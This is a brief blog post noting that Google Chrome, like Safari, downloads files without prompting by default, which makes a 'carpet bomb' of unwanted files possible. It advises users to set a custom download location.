Yesterday, Google released its new web browser Chrome, I just download and give it a try. After reading a brief introduction in it official homepage, I discover that there may be a vulnerability. Here is the description from the official.
No intrusive download manager; you see your download’s status at the bottom of your current window.
I did not watch the introduction video yet, but from the description, first thing I was wondering is: Does it has the same carpet bomb as Safari? May be some of you did not read my entry before talking about the carpet bomb in Safari. There is a bomb because Safari does not notify user before it start downloading a file from a website. Which means you can push tons of files to victim’s computer without his notification, and fill his folder up with your files (in Safari, the default destination of downloaded files is desktop, then you can imagine what will happen). With a friendly file name, you can even incite victim to execute your evil file.
Unfortunately, the default setting of Google Chrome have such a problem, it downloads files without asking user’s permission, although the destination of downloaded files is not your desktop. Luckily, unlike Safari, Chrome allow user to choose the destination each time when a file is going to be downloaded. So before using Chrome as your default browser, customize its download location setting first.
I can imagine that there are more bugs comeing from Chrome in the future (Of course, no software is perfect). So before the next bug has been discovered, enjoy your life in Google Chrome.
Reference:
Filed under: app sec , Google Chrome, safari
